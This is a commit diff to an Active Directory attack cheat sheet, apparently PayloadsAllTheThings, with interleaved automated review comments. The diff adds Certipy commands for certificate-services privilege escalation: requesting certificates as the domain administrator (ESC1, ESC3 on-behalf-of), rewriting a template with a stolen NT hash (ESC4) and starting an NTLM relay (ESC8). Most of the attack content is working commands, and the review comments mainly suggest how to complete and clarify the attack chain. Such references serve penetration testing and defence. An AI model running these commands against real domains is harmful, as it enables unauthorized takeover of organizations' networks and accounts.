mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-07 18:48:47 +00:00
ESC3 - Misconfigured Enrollment Agent Templates + Certipy v2
parent 71dcfd5ca7
commit 3e3562e553
1 changed file with 71 additions and 36 deletions
|
@ -75,9 +75,10 @@
|
||||||
- [Active Directory Certificate Services](#active-directory-certificate-services)
|
- [Active Directory Certificate Services](#active-directory-certificate-services)
|
||||||
- [ESC1 - Misconfigured Certificate Templates](#esc1---misconfigured-certificate-templates)
|
- [ESC1 - Misconfigured Certificate Templates](#esc1---misconfigured-certificate-templates)
|
||||||
- [ESC2 - Misconfigured Certificate Templates](#esc2---misconfigured-certificate-templates)
|
- [ESC2 - Misconfigured Certificate Templates](#esc2---misconfigured-certificate-templates)
|
||||||
|
- [ESC3 - Misconfigured Enrollment Agent Templates](#esc3---misconfigured-enrollment-agent-templates)
|
||||||
- [ESC4 - Access Control Vulnerabilities](#esc4---access-control-vulnerabilities)
|
- [ESC4 - Access Control Vulnerabilities](#esc4---access-control-vulnerabilities)
|
||||||
* [ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 ](#esc6---editf_attributesubjectaltname2)
|
- [ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2 ](#esc6---editf_attributesubjectaltname2)
|
||||||
* [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control)
|
- [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control)
|
||||||
- [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
|
- [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
|
||||||
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
- [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
||||||
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
|
- [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
|
||||||
|
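Review bot: the table of contents still jumps from ESC4 straight to ESC6 while this hunk slots ESC3 into its correct position; if ESC5 has no section on the page, either add a stub entry or note the omission so the numbering gap does not look accidental. The ESC1 and ESC2 entries also carry the identical title "Misconfigured Certificate Templates", so the two anchors are indistinguishable in the TOC; give ESC2 a title that says what differs from ESC1.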
@ -210,8 +211,7 @@ Use the correct collector
|
||||||
* AzureHound for Azure Active Directory
|
* AzureHound for Azure Active Directory
|
||||||
* SharpHound for local Active Directory
|
* SharpHound for local Active Directory
|
||||||
|
|
||||||
use [AzureHound](https://posts.specterops.io/introducing-bloodhound-4-0-the-azure-update-9b2b26c5e350)
|
* use [AzureHound](https://posts.specterops.io/introducing-bloodhound-4-0-the-azure-update-9b2b26c5e350)
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
# require: Install-Module -name Az -AllowClobber
|
# require: Install-Module -name Az -AllowClobber
|
||||||
# require: Install-Module -name AzureADPreview -AllowClobber
|
# require: Install-Module -name AzureADPreview -AllowClobber
|
||||||
|
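Review bot: the `* use [AzureHound]` bullet lists both the `Az` and `AzureADPreview` modules as prerequisites, but the only login shown in the surrounding context is `Connect-AzAccount` (see the next hunk header); if `Invoke-AzureHound` also needs an Azure AD session, add that login cmdlet next to the module requirement, otherwise drop the unused module from the `# require:` comments.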
@ -221,8 +221,7 @@ Connect-AzAccount
|
||||||
Invoke-AzureHound
|
Invoke-AzureHound
|
||||||
```
|
```
|
||||||
|
|
||||||
use [BloodHound](https://github.com/BloodHoundAD/BloodHound)
|
* use [BloodHound](https://github.com/BloodHoundAD/BloodHound)
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
# run the collector on the machine using SharpHound.exe
|
# run the collector on the machine using SharpHound.exe
|
||||||
# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe
|
# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe
|
||||||
|
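Review bot: the `# https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe` comment points at `master`, so the binary it resolves to changes over time; pin to a release tag or state that the collector version has to match the BloodHound GUI version the reader imports into.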
@ -245,6 +244,10 @@ Invoke-BloodHound -CollectionMethod All -LDAPUser <UserName> -LDAPPass <Passwor
|
||||||
pip install bloodhound
|
pip install bloodhound
|
||||||
bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all
|
bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all
|
||||||
```
|
```
|
||||||
|
* Collect more data for certificates exploitation using Certipy
|
||||||
|
```ps1
|
||||||
|
certipy find 'corp.local/john:Passw0rd@dc.corp.local' -bloodhound
|
||||||
|
```
|
||||||
|
|
||||||
Then import the zip/json files into the Neo4J database and query them.
|
Then import the zip/json files into the Neo4J database and query them.
|
||||||
|
|
||||||
|
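Review bot: the placeholder credential in `certipy find 'corp.local/john:Passw0rd@dc.corp.local' -bloodhound` is `Passw0rd`, while every other Certipy line added in this commit uses `Passw0rd!`; make it consistent so a reader following the whole walkthrough does not hit a logon failure on the first step. The fence is tagged `ps1` although `certipy` is run from a Linux shell (the `bloodhound-python` block just above has the same problem); `bash` is the accurate tag. Finally, the "Then import the zip/json files" sentence should say that the `-bloodhound` output uses Certipy's own node and edge types and is queried with the Certipy custom queries added later in this commit.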
@ -264,6 +267,7 @@ You can add some custom queries like :
|
||||||
* [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json)
|
* [Bloodhound-Custom-Queries from @hausec](https://github.com/hausec/Bloodhound-Custom-Queries/blob/master/customqueries.json)
|
||||||
* [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json)
|
* [BloodHoundQueries from CompassSecurity](https://github.com/CompassSecurity/BloodHoundQueries/blob/master/customqueries.json)
|
||||||
* [BloodHound Custom Queries from Exegol - @ShutdownRepo](https://raw.githubusercontent.com/ShutdownRepo/Exegol/master/sources/bloodhound/customqueries.json)
|
* [BloodHound Custom Queries from Exegol - @ShutdownRepo](https://raw.githubusercontent.com/ShutdownRepo/Exegol/master/sources/bloodhound/customqueries.json)
|
||||||
|
* [Certipy BloodHound Custom Queries from ly4k](https://github.com/ly4k/Certipy/blob/main/customqueries.json)
|
||||||
|
|
||||||
Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`.
|
Replace the customqueries.json file located at `/home/username/.config/bloodhound/customqueries.json` or `C:\Users\USERNAME\AppData\Roaming\BloodHound\customqueries.json`.
|
||||||
|
|
||||||
|
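Review bot: the new `Certipy BloodHound Custom Queries from ly4k` entry should say that these queries are written for the data produced by `certipy find -bloodhound`, not for a SharpHound-only dataset; without that note a reader who replaces `customqueries.json` with this file and only ran SharpHound will see empty results. The list also mixes `blob` and `raw.githubusercontent.com` URLs; since the next sentence tells the reader to replace the file on disk, raw links are the more useful form.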
@ -2213,11 +2217,12 @@ Exploitation:
|
||||||
or
|
or
|
||||||
PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local'
|
PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local'
|
||||||
```
|
```
|
||||||
* Use Certify or [Certi](https://github.com/eloypgz/certi) to request a Certificate and add an alternative name (user to impersonate)
|
* Use Certify, [Certi](https://github.com/eloypgz/certi) or [Certipy](https://github.com/ly4k/Certipy) to request a Certificate and add an alternative name (user to impersonate)
|
||||||
```ps1
|
```ps1
|
||||||
# request certificates for the machine account by executing Certify with the "/machine" argument from an elevated command prompt.
|
# request certificates for the machine account by executing Certify with the "/machine" argument from an elevated command prompt.
|
||||||
Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:VulnTemplate /altname:domadmin
|
Certify.exe request /ca:dc.domain.local\domain-DC-CA /template:VulnTemplate /altname:domadmin
|
||||||
certi.py req 'contoso.local/Anakin@dc01.contoso.local' contoso-DC01-CA -k -n --alt-name han --template UserSAN
|
certi.py req 'contoso.local/Anakin@dc01.contoso.local' contoso-DC01-CA -k -n --alt-name han --template UserSAN
|
||||||
|
certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC1' -alt 'administrator@corp.local'
|
||||||
```
|
```
|
||||||
* Use OpenSSL and convert the certificate, do not enter a password
|
* Use OpenSSL and convert the certificate, do not enter a password
|
||||||
```ps1
|
```ps1
|
||||||
|
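Review bot: the comment line `# request certificates for the machine account by executing Certify with the "/machine" argument from an elevated command prompt.` applies only to `Certify.exe`, and the bullet that follows the block ("Use OpenSSL and convert the certificate, do not enter a password") applies to Certify's output, not to `certipy req ... -alt 'administrator@corp.local'`, which already writes a `.pfx` (the ESC3 hunk shows `Saved certificate and private key to 'john.pfx'`). Mark the OpenSSL step as Certify/Certi-only so readers do not try to convert a file Certipy never produces. Also worth one sentence: in the Certipy line `-ca 'corp-CA'` is the CA name, while the host after `@` in the target string is where the request is sent.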
@ -2246,6 +2251,21 @@ Exploitation:
|
||||||
* Request a certificate specifying the `/altname` as a domain admin like in [ESC1](#esc1---misconfigured-certificate-templates).
|
* Request a certificate specifying the `/altname` as a domain admin like in [ESC1](#esc1---misconfigured-certificate-templates).
|
||||||
|
|
||||||
|
|
||||||
|
#### ESC3 - Misconfigured Enrollment Agent Templates
|
||||||
|
|
||||||
|
> ESC3 is when a certificate template specifies the Certificate Request Agent EKU (Enrollment Agent). This EKU can be used to request certificates on behalf of other users
|
||||||
|
|
||||||
|
* Request a certificate based on the vulnerable certificate template ESC3.
|
||||||
|
```ps1
|
||||||
|
$ certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC3'
|
||||||
|
[*] Saved certificate and private key to 'john.pfx'
|
||||||
|
```
|
||||||
|
* Use the Certificate Request Agent certificate (-pfx) to request a certificate on behalf of other another user
|
||||||
|
```ps1
|
||||||
|
$ certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'User' -on-behalf-of 'corp\administrator' -pfx 'john.pfx'
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
#### ESC4 - Access Control Vulnerabilities
|
#### ESC4 - Access Control Vulnerabilities
|
||||||
|
|
||||||
> Enabling the `mspki-certificate-name-flag` flag for a template that allows for domain authentication, allow attackers to "push a misconfiguration to a template leading to ESC1 vulnerability
|
> Enabling the `mspki-certificate-name-flag` flag for a template that allows for domain authentication, allow attackers to "push a misconfiguration to a template leading to ESC1 vulnerability
|
||||||
|
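Review bot: the ESC3 section ends after the second `certipy req ... -template 'User' -on-behalf-of 'corp\administrator' -pfx 'john.pfx'` with no final step; say which file that command saves and that this is the certificate used to authenticate as the administrator (the same last step ESC1 describes), otherwise the reader has two pfx files and no indication which one matters. The blockquote gives only one of the two conditions: the enrollment agent template must be enrollable by the low-privileged user, and a second template (here the built-in `User` template) must accept a request signed by a Certificate Request Agent; stating both explains why the hunk needs two requests. Typo in the bullet: "on behalf of other another user". The `$ ` prompts inside a `ps1` fence also read oddly; use a `bash` fence without prompts, matching the other Certipy blocks.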
@ -2266,6 +2286,17 @@ Exploitation:
|
||||||
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -value 0 -property mspki-Certificate-Name-Flag
|
python3 modifyCertTemplate.py domain.local/user -k -no-pass -template user -dc-ip 10.10.10.10 -value 0 -property mspki-Certificate-Name-Flag
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Using Certipy
|
||||||
|
|
||||||
|
```ps1
|
||||||
|
# overwrite the configuration to make it vulnerable to ESC1
|
||||||
|
certipy template 'corp.local/johnpc$@ca.corp.local' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -save-old
|
||||||
|
# request a certificate based on the ESC4 template, just like ESC1.
|
||||||
|
certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC4' -alt 'administrator@corp.local'
|
||||||
|
# restore the old configuration
|
||||||
|
certipy template 'corp.local/johnpc$@ca.corp.local' -hashes :fc525c9683e8fe067095ba2ddc971889 -template 'ESC4' -configuration ESC4.json
|
||||||
|
```
|
||||||
|
|
||||||
#### ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2
|
#### ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2
|
||||||
|
|
||||||
> If this flag is set on the CA, any request (including when the subject is built from Active Directory) can have user defined values in the subject alternative name.
|
> If this flag is set on the CA, any request (including when the subject is built from Active Directory) can have user defined values in the subject alternative name.
|
||||||
|
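Review bot: `certipy template ... -template 'ESC4' -save-old` rewrites the whole template configuration (the comment says "overwrite the configuration"), not a single attribute as the `modifyCertTemplate.py ... -property mspki-Certificate-Name-Flag` lines above do, so the closing `certipy template ... -configuration ESC4.json` is mandatory cleanup, not an optional extra; say so explicitly and state that `ESC4.json` is the file `-save-old` produced. The block also switches principals without explanation (`johnpc$` with an NT hash for the write, `john` with a password for the request); one sentence noting that the write needs a principal with write rights on the template object while any user the template allows to enrol can then request would make the lab setup clear.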
@ -2287,7 +2318,7 @@ Mitigation:
|
||||||
#### ESC7 - Vulnerable Certificate Authority Access Control
|
#### ESC7 - Vulnerable Certificate Authority Access Control
|
||||||
|
|
||||||
Exploitation:
|
Exploitation:
|
||||||
* Detect CAs that allow low privileged users the ManageCA permission
|
* Detect CAs that allow low privileged users the `ManageCA` or `Manage Certificates` permissions
|
||||||
```ps1
|
```ps1
|
||||||
Certify.exe find /vulnerable
|
Certify.exe find /vulnerable
|
||||||
```
|
```
|
||||||
|
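Review bot: the reworded bullet mixes naming schemes: `ManageCA` is Certify's name for the "Manage CA" right, while `Manage Certificates` is neither the Certify form (`ManageCertificates`) nor the certsrv UI label ("Issue and Manage Certificates"); use one scheme for both. Since this commit adds the Certipy equivalent to ESC1, ESC3, ESC4 and ESC8, the detection step here should also get the Certipy `find` command alongside `Certify.exe find /vulnerable`.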
@ -2387,6 +2418,10 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
|
||||||
unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .
|
unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .
|
||||||
output - Output path to store base64 generated crt.
|
output - Output path to store base64 generated crt.
|
||||||
```
|
```
|
||||||
|
* Version 4: Certipy ESC8
|
||||||
|
```ps1
|
||||||
|
certipy relay -ca 172.16.19.100
|
||||||
|
```
|
||||||
|
|
||||||
### Dangerous Built-in Groups Usage
|
### Dangerous Built-in Groups Usage
|
||||||
|
|
||||||
|
|
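Review bot: `certipy relay -ca 172.16.19.100` only starts the relay listener; the authentication it relays still has to be coerced, and the `unc - Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam)` context above belongs to the Version 3 tool's own options, so the new "Version 4" entry should state that PetitPotam or an equivalent coercion is run separately with the attacker host as the listener, and which account and template the relayed enrollment ends up using. The fence should be `bash` rather than `ps1`, consistent with the other Certipy blocks in this commit.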